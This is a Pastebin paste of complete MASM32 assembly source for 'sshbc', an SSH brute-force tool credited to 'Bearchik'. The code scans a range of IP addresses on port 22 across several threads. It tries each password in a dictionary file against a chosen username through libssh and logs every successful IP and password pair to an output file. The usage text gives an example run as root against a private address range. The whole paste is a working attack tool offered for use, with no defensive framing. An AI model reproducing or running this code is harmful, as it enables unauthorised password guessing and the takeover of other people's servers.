Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ---------------------------------------------ssh.inc-----------------------------------------------
- SSH_OPTIONS_HOST equ 0
- SSH_OPTIONS_FD equ 3
- SSH_OPTIONS_USER equ 5
- .data
- sshlib db "ssh.dll",0
- sshn db "ssh_new", 0
- ssh_opt_set db "ssh_options_set",0
- ssh_conn db "ssh_connect",0
- ssh_authpass db "ssh_userauth_password",0
- ssh_dis db "ssh_disconnect", 0
- ssh_f db "ssh_free",0
- .data?
- ssh_new dd ?
- ssh_options_set dd ?
- ssh_connect dd ?
- ssh_userauth_password dd ?
- ssh_disconnect dd ?
- ssh_free dd ?
- ---------------------------------------------sshbc.Inc-----------------------------------------------
- include windows.inc
- include kernel32.inc
- include user32.inc
- include ntdll.inc
- include ssh.inc
- include ws2_32.inc
- include wsock32.inc
- include \masm32\macros\macros.asm
- includelib ws2_32.lib
- includelib kernel32.lib
- includelib user32.lib
- includelib ntdll.lib
- includelib masm32.lib
- includelib .\ssh\ssh.lib
- load_ssh PROTO
- ssh_check PROTO:DWORD, :DWORD, :DWORD
- read_string PROTO:DWORD, :DWORD, :DWORD, :DWORD
- get_ip PROTO:DWORD, :DWORD
- res_write PROTO:DWORD, :DWORD, :DWORD
- new_thread PROTO:DWORD
- cmdlin_parse PROTO:DWORD
- create_hex PROTO:DWORD
- copy_cmd_str PROTO:DWORD, :DWORD
- ;const
- WS_VER equ 202h
- SSH_PORT equ 22
- .data
- wsaErr db "WSAStartup error!",0dh,0ah
- sockErr db "Socket open error!",0dh,0ah
- sshErr db "Failure establishing SSH session!",0dh,0ah
- usage db "Created by Bearchik(http://crazyasm.blogspot.com)",0dh,0ah
- db "USAGE:",0dh,0ah
- db " -t threads counter",0dh,0ah
- db " -s start IP",0dh,0ah
- db " -e end IP",0dh,0ah
- db " -u username",0dh,0ah
- db " -d dictionary filename",0dh,0ah
- db " -o output filename",0dh,0ah
- db "EXAMPLE:",0dh,0ah
- db "sshbc.exe -t10 -s192.168.1.0 -e192.168.255.0 -uroot -dfiledict.txt -ofile_out.txt",0dh,0ah,0h
- finishmsg db "Work is FINISHED!",0dh,0ah
- .data?
- ooutfile db 512 dup (?)
- fdict db 512 dup (?)
- username db 256 dup (?)
- startIP db 16 dup (?)
- endIP db 16 dup (?)
- stdhndl dd ?
- siptmp dd ?
- sip dd ?
- eip dd ?
- pThread dd ?
- tflag dd ?
- cThread dd ?
- cmdflag dd ?
- ---------------------------------------------sshbc.asm-----------------------------------------------
- .386
- .model flat, stdcall ;32 bit memory model
- option casemap :none ;case sensitive
- include sshbc.Inc
- .code
- start:
- invoke GetStdHandle,STD_OUTPUT_HANDLE
- mov stdhndl, eax
- invoke load_ssh
- invoke GetCommandLine
- invoke cmdlin_parse, eax
- .if cmdflag != 6
- invoke WriteConsole, stdhndl, offset usage, 109h, NULL, NULL
- jmp exitprog
- .endif
- mov ecx, cThread
- create_thread:
- invoke inet_addr, offset startIP
- mov sip, eax
- invoke inet_addr, offset endIP
- mov eip, eax
- invoke get_ip, sip, eip
- .if eax == 0
- jmp finspinlock
- .endif
- ; invoke new_thread, siptmp
- mov eax, offset new_thread
- invoke CreateThread, NULL, 10240, eax , siptmp, 0, pThread
- inc tflag
- mov eax, tflag
- .if eax >= cThread
- jmp spinlock
- .endif
- jmp create_thread
- spinlock:
- invoke SleepEx,1,0
- mov eax, tflag
- .if eax < cThread
- jmp create_thread
- .endif
- jmp spinlock
- finspinlock:
- invoke SleepEx,1,0
- cmp tflag, 0
- jne spinlock
- invoke WriteConsole, stdhndl, offset finishmsg, sizeof finishmsg, NULL, NULL
- exitprog:
- invoke CloseHandle, eax
- invoke ExitProcess, 0
- cmdlin_parse proc cmd:DWORD
- mov edi, cmd
- nextkey:
- .if WORD PTR [edi] == 742dh ;-t
- invoke create_hex, edi
- mov cThread, eax
- inc cmdflag
- .endif
- .if WORD PTR [edi] == 732dh ;-s
- invoke copy_cmd_str, edi, offset startIP
- inc cmdflag
- .endif
- .if WORD PTR [edi] == 652dh ;-e
- invoke copy_cmd_str, edi, offset endIP
- inc cmdflag
- .endif
- .if WORD PTR [edi] == 752dh ;-u
- invoke copy_cmd_str, edi, offset username
- inc cmdflag
- .endif
- .if WORD PTR [edi] == 642dh ;-d
- invoke copy_cmd_str, edi, offset fdict
- inc cmdflag
- .endif
- .if WORD PTR [edi] == 6f2dh ;-o
- invoke copy_cmd_str, edi, offset ooutfile
- inc cmdflag
- .endif
- .if BYTE PTR [edi] == 0
- jmp parsend
- .endif
- inc edi
- jmp nextkey
- parsend:
- ret
- cmdlin_parse endp
- copy_cmd_str proc uses edi strnum:DWORD, outstr:DWORD
- mov esi, strnum
- add esi, 2
- xor ebx,ebx
- mov edi, outstr
- nextchar:
- mov al, BYTE PTR [esi+ebx]
- mov BYTE PTR [edi+ebx], al
- inc ebx
- .if BYTE PTR [esi+ebx] == 20h || BYTE PTR [esi+ebx] == 0h
- jmp endchar
- .endif
- jmp nextchar
- endchar:
- mov BYTE PTR [edi+ebx], 0h
- ret
- copy_cmd_str endp
- create_hex proc stnum:DWORD
- LOCAL koef:DWORD
- LOCAL sum:DWORD
- mov sum,0h
- mov koef, 1h
- mov ebx, stnum
- add ebx, 2h
- nextcif:
- .if BYTE PTR [ebx] == 20h || BYTE PTR [ebx] == 0h
- jmp endcif
- .endif
- inc ebx
- jmp nextcif
- endcif:
- xor eax, eax
- mov al, BYTE PTR [ebx-1]
- sub eax, 30h
- mov ecx, koef
- mul ecx
- add sum, eax
- mov eax, ecx
- mov ecx, 0Ah
- mul ecx
- mov koef, eax
- dec ebx
- .if BYTE PTR [ebx-1] == 74h
- jmp calcd
- .endif
- jmp endcif
- calcd:
- mov eax, sum
- ret
- create_hex endp
- new_thread proc pip:DWORD
- LOCAL sfile:DWORD
- LOCAL dist:DWORD
- LOCAL fHandle:DWORD
- LOCAL password[128]:BYTE
- LOCAL ipaddr[16]:BYTE
- invoke RtlIpv4AddressToString, ADDR pip, ADDR ipaddr
- xor eax, eax
- mov dist, eax
- invoke CreateFile, offset fdict,GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_ALWAYS,FILE_ATTRIBUTE_NORMAL, NULL
- mov fHandle, eax
- invoke GetFileSize,fHandle,NULL
- mov sfile, eax
- nextpass:
- mov eax, sfile
- .if eax < dist
- jmp threadend
- .endif
- invoke read_string, ADDR password, dist, fHandle, sfile
- mov dist, eax
- invoke ssh_check, pip, offset username, ADDR password
- .if al == 1
- jmp nextpass
- .endif
- .if al == 0
- invoke res_write, offset ooutfile, pip, ADDR password
- .endif
- threadend:
- invoke CloseHandle,fHandle
- dec tflag
- invoke WriteConsole, stdhndl, ADDR ipaddr, 16, NULL, NULL
- ret
- new_thread endp
- res_write proc outfile:DWORD, pip:DWORD, password:DWORD
- LOCAL cWrite:DWORD
- LOCAL nByte:DWORD
- LOCAL fouthandle:DWORD
- LOCAL ipaddr[16]:BYTE
- LOCAL outString[128]:BYTE
- invoke RtlIpv4AddressToString, ADDR pip, ADDR ipaddr
- lea edx, ipaddr
- lea edi, outString
- xor eax, eax
- nextsimip:
- mov bl, BYTE PTR [edx+eax]
- .if BYTE PTR [edx+eax] == 0
- jmp endcopyip
- .endif
- mov BYTE PTR [edi+eax], bl
- inc eax
- jmp nextsimip
- endcopyip:
- add edi, eax
- mov BYTE PTR [edi], 3bh
- inc edi
- xor eax, eax
- mov edx, password
- nextsimpass:
- mov bl, BYTE PTR [edx+eax]
- .if BYTE PTR [edx+eax] == 0
- jmp endcopypass
- .endif
- mov BYTE PTR [edi+eax], bl
- inc eax
- jmp nextsimpass
- endcopypass:
- add edi, eax
- mov BYTE PTR [edi], 0dh
- mov BYTE PTR [edi+1], 0ah
- mov BYTE PTR [edi+2], 0h
- invoke CreateFile, outfile, GENERIC_WRITE,FILE_SHARE_WRITE, NULL,OPEN_ALWAYS,FILE_ATTRIBUTE_NORMAL, 0
- mov fouthandle, eax
- ; invoke SetFilePointer,fouthandle, 0, NULL, FILE_BEGIN
- invoke SetFilePointer, fouthandle, NULL,NULL, FILE_END
- invoke lstrlen, ADDR outString
- mov nByte, eax
- invoke WriteFile, fouthandle, ADDR outString, nByte, ADDR cWrite, NULL
- invoke CloseHandle, fouthandle
- ret
- res_write endp
- get_ip proc sIP:DWORD, eIP:DWORD
- .if siptmp == 0
- mov eax, sIP
- mov siptmp, eax
- jmp endIPSearch
- .endif
- mov eax, siptmp
- .if eIP == eax
- xor eax, eax
- jmp endIPSearch
- .endif
- inc BYTE PTR [siptmp+3]
- jnz outIP
- inc BYTE PTR [siptmp+2]
- jnz outIP
- inc BYTE PTR [siptmp+1]
- jnz outIP
- inc BYTE PTR [siptmp]
- outIP:
- mov eax, siptmp
- endIPSearch:
- ret
- get_ip endp
- read_string proc pass:DWORD, d:DWORD, fHandle:DWORD, sfile:DWORD
- LOCAL buf:DWORD
- LOCAL cRead:DWORD
- mov edi, pass
- nextchr:
- invoke SetFilePointer, fHandle, d, NULL, FILE_BEGIN
- invoke ReadFile, fHandle, ADDR buf, 1, ADDR cRead, NULL
- .if BYTE PTR [buf] == 0Dh
- mov BYTE PTR [edi],0h
- jmp stringend
- .endif
- mov al, BYTE PTR [buf]
- mov BYTE PTR [edi], al
- inc d
- mov eax, sfile
- .if eax < d
- jmp stringend
- .endif
- inc edi
- jmp nextchr
- stringend:
- mov eax, d
- add eax, 2h
- ret
- read_string endp
- ssh_check proc ip:DWORD, uname:DWORD, pass:DWORD
- LOCAL sess:DWORD
- LOCAL sock:DWORD
- LOCAL saddr:sockaddr_in
- LOCAL ws:WSADATA
- LOCAL ipaddr[16]:BYTE
- invoke WSAStartup, WS_VER, ADDR ws
- .if eax != 0
- invoke WriteConsole, stdhndl, offset wsaErr, sizeof wsaErr, NULL, NULL
- jmp emergExit
- .endif
- invoke socket, AF_INET, SOCK_STREAM, IPPROTO_TCP
- .if eax == -1
- invoke WriteConsole, stdhndl, offset sockErr, sizeof sockErr, NULL, NULL
- invoke WSACleanup
- jmp emergExit
- .endif
- mov sock, eax
- invoke htons, SSH_PORT
- mov saddr.sin_port,ax
- mov eax, ip
- mov saddr.sin_addr,eax
- mov saddr.sin_family,AF_INET
- invoke connect,sock,addr saddr,sizeof saddr
- .if eax == -1
- push -1
- jmp closeSock
- .endif
- call ssh_new
- mov sess, eax
- invoke RtlIpv4AddressToString, ADDR ip, ADDR ipaddr
- lea eax, ipaddr
- push eax
- push 0
- push sess
- call ssh_options_set
- .if eax != 0
- invoke WriteConsole, stdhndl, offset sshErr, sizeof sshErr, NULL, NULL
- jmp closeSock
- .endif
- push sess
- call ssh_connect
- push pass
- push uname
- push sess
- call ssh_userauth_password
- .if eax == 0
- push 0
- jmp closessh
- .endif
- .if eax == 1
- push 1
- jmp closessh
- .endif
- push 0
- closessh:
- push sess
- call ssh_disconnect
- pop eax
- push sess
- call ssh_free
- pop eax
- closeSock:
- invoke closesocket,sock
- invoke WSACleanup
- emergExit:
- pop eax
- ; mov eax, DWORD PTR [esp+4]
- ret
- ssh_check endp
- load_ssh proc
- LOCAL a_lib:DWORD
- invoke LoadLibrary, offset sshlib
- mov a_lib, eax
- invoke GetProcAddress, a_lib, offset sshn
- mov ssh_new, eax
- invoke GetProcAddress, a_lib, offset ssh_opt_set
- mov ssh_options_set, eax
- invoke GetProcAddress, a_lib, offset ssh_conn
- mov ssh_connect, eax
- invoke GetProcAddress, a_lib, offset ssh_authpass
- mov ssh_userauth_password, eax
- invoke GetProcAddress, a_lib, offset ssh_dis
- mov ssh_disconnect, eax
- invoke GetProcAddress, a_lib, offset ssh_f
- mov ssh_free, eax
- ret
- load_ssh endp
- end start
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement